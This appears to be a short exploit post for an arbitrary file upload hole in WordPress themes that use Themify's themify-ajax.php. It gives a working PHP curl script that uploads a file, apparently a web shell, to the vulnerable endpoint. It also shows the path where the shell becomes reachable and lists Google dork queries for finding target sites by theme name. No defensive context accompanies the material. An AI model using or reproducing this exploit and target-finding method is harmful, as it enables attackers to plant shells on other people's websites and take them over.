Arbitrary File Upload
Exploit : /wp-content/themes/select a theme/themify/themify-ajax.php
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php
Script :
<?php
$uploadfile="inc0vers.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://yourtarget.com/wp-content/themes/select a theme/uploads/your file
Kod:
inurl:"/wp-content/themes/Elemin/"
inurl:"/wp-content/themes/Bloggie/"
inurl:"/wp-content/themes/Tisa/"
inurl:"/wp-content/themes/Funki/"
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/FOlo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/Suco/"
inurl:"/wp-content/themes/iThemes2/"